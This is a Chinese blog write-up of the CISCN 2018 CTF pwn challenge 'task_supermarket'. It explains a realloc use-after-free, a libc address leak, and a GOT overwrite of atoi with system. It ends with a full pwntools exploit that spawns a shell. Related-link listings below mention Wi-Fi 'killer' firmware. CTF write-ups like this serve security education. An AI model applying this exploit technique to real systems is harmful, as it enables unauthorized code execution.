CISCN 2018 PWN task_supermarket

最新推荐文章于 2022-04-26 22:50:11 发布
最新推荐文章于 2022-04-26 22:50:11 发布
阅读量1.6k 收藏
点赞数
分类专栏: 2018 全国大学生信息安全竞赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/80144580
版权

序言

第一次在大赛中做出PWN题, 心情有点小激动.

程序运行

0. 结构体

struct node{
    char name[16];
    int price;
    int size;
    char* des;
}commodity[15];

1.MENU

1. add a commodity
2. del a commodity
3. list commodities
4. Change the price of a commodity
5. Change the description of a commodity
6. exit

2. Add

add 一个 commodity, 输入name, price, descrip_size

3. Del

‘del’一个commodity, 数组的指针会清零, des释放, price清零

4. list

列出所有内容,

5. Change the price(没什么用)
6. Change the description of a commodity

    漏洞在realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原原指针, 重新分配内存. 但数组中的s指针并没有改成新分配的堆指针, 仍指向已释放的, 这点很重要. 此时又分配一个node, 恰好是这个已释放的堆, 那么上一个堆就可以编辑这个新分配的堆, 恐怖.

char *realloc(ptr, newSize)
    char     *ptr;      /* Ptr to currently allocated block.  If
                 * it's 0, then this procedure behaves
                 * identically to malloc. */
    unsigned int newSize;   /* Size of block after it is extended */
{
    unsigned int curSize;
    char *newPtr;

    if (ptr == 0) {
       return malloc(newSize);
    }
    curSize = Mem_Size(ptr);
    if (newSize <= curSize) {
       return ptr;
    }
    newPtr = malloc(newSize);
    bcopy(ptr, newPtr, (int) curSize);
    free(ptr);
    return(newPtr);
}

过程

    思路: 利用realloc函数产生的释放原指针, 程序没有更新指针. 实现修改leak memory求得system真实地址,修改atoi的got表值为system, 发送/bin/sh\x00.

步骤一

new("bill", 100, 0x80, "A"*0x80) # target
new("john", 200, 0x18, "A"*0x18) #
change_des("bill", 0xb0, "")     # 下面结果可以看见bill的原指针已被释放
'''
chunk      0x9dde000        0x20            (inuse)
chunk      0x9dde020        0x88            (F) FD 0xf76e5700 BK 0xf76e57b0
chunk      0x9dde0a8        0x20            (inuse)
chunk      0x9dde0c8        0x20            (inuse)
chunk      0x9dde0e8        0xb8            (inuse)
'''
new("merry", 200, 0x50, "A"*0x7) # merry被分配到此处, bill可以编辑`merry的s`

步骤二: leak memory

payload = "merry\x00" + "A"*(0x1c-6-4-4) + p32(0x50) + p32(atoi) + p16(0x59) # 泄露atoi的函数地址, 这也是为了确定远程的libc.so的版本, 然后使用libc-database找出其版本
change_des("bill", 0x80, payload)
list_all()

步骤三: modify

change_des("merry", 0x50, p32(system)) #修改merry, 输入system, 相当于修改atoi的got值为system地址

步骤四: get shell

p.sendline("/bin/sh\x00")

The Whole EXP


from pwn import *

p = process("./task_supermarket")
#p = remote("117.78.43.123", 31420)
elf = ELF("./task_supermarket")
#libc = ELF("./libc.so.6")
libc = ELF("./libc.so") #本机的libc
context.log_level = 'debug'

def new(name, price, size, des):
    p.recvuntil("your choice>> ")
    p.sendline("1")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("price:")
    p.sendline(str(price))
    p.recvuntil("descrip_size:")
    p.sendline(str(size))
    p.recvuntil("description:")
    p.sendline(des)

def delete(name):
    p.recvuntil("your choice>> ")
    p.send("2\n")
    p.recvuntil("name:")
    p.sendline(name)

def list_all():
    p.recvuntil("your choice>> ")
    p.send("3\n")

def change_price(name, price):
    p.recvuntil("your choice>> ")
    p.sendline("4")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("or rise in:")
    p.sendline(str(price))

def change_des(name, size, des):
    p.recvuntil("your choice>> ")
    p.sendline("5")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("descrip_size:")
    p.sendline(str(size))
    p.recvuntil("description:")
    p.sendline(des)

free_got = elf.got['free']
atoi = elf.got['atoi']
puts = elf.plt['puts']

gdb.attach(p)
new("bill", 100, 0x80, "A"*0x80)
new("john", 200, 0x18, "A"*0x18)
change_des("bill", 0xb0, "")
new("merry", 200, 0x50, "A"*0x7)

payload = "merry\x00" + "A"*(0x1c-6-4-4) + p32(0x50) + p32(atoi) + p16(0x59)
change_des("bill", 0x80, payload)
list_all()
p.recvuntil("merry: price.")
p.recv(16)
real_atoi = u32(p.recv(4))
system = real_atoi - (libc.symbols['atoi'] - libc.symbols['system'])

log.info("real_atoi: %s" % hex(real_atoi))
log.info("system: %s" % hex(system))
change_des("merry", 0x50, p32(system))

p.recvuntil("your choice>> ")
p.sendline("/bin/sh\x00")
p.interactive()

相关文件

qq_33528164
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 836
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
2019-CISCN华南赛区半决赛 pwn8
像初雪一样自由洒落
02-22 439
参考博客:https://xz.aliyun.com/t/5517#toc-3 学长给了这道题目,结合了逆向+pwn 64位的程序,是静态链接的,静态!可以直接构造rop链了 就开启了nx保护 执行的时候发现权限不够,直接给他加权限就可以,chmod +x easy_pwn 执行 emm,要把文件拖入桌面然后放入ida里面,因为桌面是C盘,有管理...
CISCN2018-Crypto】 crackme-java解析
ATFWUS的博客
06-09 1073
今天闲着无事,于是翻到了buu密码学的最后一页,看到了一道名字带java的题,还是很亲切的,于是花了一点时间做出来了,发现网上相关的wp较少,于是有了这篇wp,一步一步分析。 1.原题 题目为crackme-java,包含一个java源文件,没有其它提示。 import java.math.BigInteger; import java.util.Random; public class Test1 { static BigInteger two =new BigInteger("2").
PWN学习总结(不断完善中)(有道云笔记)
tbsqigongzi的博客
04-26 3362
学习路线 pwn一些概念理解 王爽汇编学习笔记 DOS-BOX及编译工具–百度网盘 提取码: ajba linux知识学习(CTF主要考察linux环境下的漏洞利用)—菜鸟教程 nala包管理命令(个人感觉比apt好用) python知识学习(写exp用)----菜鸟教程 gcc编译过程(了解一下) vim用法(好难,正在学) pacvim游戏 ctf-wiki-pwn漏洞利用总结图 刷题网站 BUUCTF BUUCTF—libc源码 攻防世界 pwn环境搭建 借用另一个博主的pwn环境配置文章 再加上几个
ciscn 2018 部分writeup
StriveBen的博客
05-07 3907
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
LCTF_2018_Platform:LCTF 2018平台
05-04
LCTF 2018 platformLCTF 2018 比赛...食用方法默认后台路径api/admin/可在app/backend/lctf2018_backend/urls.py中修改。默认后台管理账号密码adminadmin123456使用时千万别忘了cd app/backendpython manage.py change
CISCN PWN签到题 task_note_service
Bill
05-02 1643
序言 比赛中这道差那么一点点就做出来了 程序运行 1.menu ---------menu--------- 1. add note 2. show note 3. edit note 4. del note 5. exit your choice&gt;&gt; 2. add 1. add note 2. show note 3. edit note 4. del...
攻防世界PWNSupermarket题解
seaaseesa的博客
11-15 2254
Supermarket 首先,看一下程序的保护机制。看起来还不错 然后,我们用IDA分析一下 分析出程序大概有这样的一个结构体 typedefstructNode{ charname[16]; intprice; intdescription_size; char*description; }Node;...
全国大学生信息安全竞赛writeup--careful(pwn150)
jmp esp
07-10 3051
描述其实没有描述。。就是一个文件,careful. 打开发现输入index和value,10个之后会打出来一个数组。思路先逆向,ida看看。 main函数很简单,return一个init_array。 到init_array里边就比较好玩了,不想看汇编直接f5,大致函数如下int initarray() { int result; char s[20]; int v2;
realloc函数UAF利用|攻防世界pwn进阶区supermarket
Kni9hT's Blog
03-21 870
文章目录思路0x00.tar解压0x01.查看保护0x02.查看程序并调试0x03.漏洞分析realloc函数详解0x04.利用思路利用过程exp编写 思路 0x00.tar解压 下载获得压缩包文件,解压之后放进ubuntu中发现还是一个tar格式压缩包。 tar -xf filename 附:linux下tar命令详解 解压得到一个libc.so.6的库和一个可执行文件 0x01.查看保护 ...
二进制学习路线(暂定)
qq_41071646的博客
11-03 2712
这个是 我们学校团队要求,,,, 让写一个二进制 (pwn/re)的学习路线,, 然后让大一 大二的学弟学妹们看看,, 我直接写到我博客里面 有什么错误或者问题还请各位指教 逆向学习路线 PC逆向方面 入门PC逆向,C语言必须要学的扎实,指针、链表一定要理解透彻,这是学习逆向的一个最基本要求。 所以要求要搞一个 链表实现的 学生管理系统 这方面学好之后,可以看一些OD(win32下的...
[pwn]堆:realloc_hook控制栈结构达成onegadget
热门推荐
Breeze的博客
12-31 1万+
[pwn]realloc_hook控制栈结构达成onegadget 文章目录[pwn]realloc_hook控制栈结构达成onegadgetchunk extend通过realloc调整栈帧来满足onegadgeteasy_pwn wp chunk extend chunk extend是一种限制比较少的堆利用方式,通常通过off by one或off by null来利用。 chuank ex...
CISCN-2018-Quals 2ex 攻防世界
qq_41071646的博客
06-07 1654
这个题目 感觉 挺。。。。 又是 MIPS框架的东西 本来一直想配置一下ida 那个插件但是 感觉很麻烦 我就没有配置 然后还是用的 jeb 然后 。。。。 跟着跟着就跟丢了 2333 主要对东西不太了解 但是 好好看一下 还是 能跟的 一开始没有看到这个细节 跟到后面发现了这个可疑字符串 去jeb 反编译一下 看看 这nm的不就是base64 看...
joj 1966 Super Market III 带期限的作业排序
kongming_acm的专栏
04-29 797
<br /> <br />A supermarket has a set Prod of products on sale. It earns a profit px for each product x∈Prod sold by a deadline dx that is measured as an integral number of time units starting from the moment the sale begins. Each product takes precisely on
supermarket CISCN-2018-Quals
qq_41071646的博客
07-25 690
这个题没有想到有一点 。。。。 参考链接 https://blog.csdn.net/qq_33528164/article/details/80144580 这个题目的漏洞点就是 在 realloc 如果 当重新分配的new_size < pre_size, 返回原指针 否则 重新分配 这个就很真实了 而且他这个 还没有改变用户态指针 如果我们操作一波就可以 用另一个...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值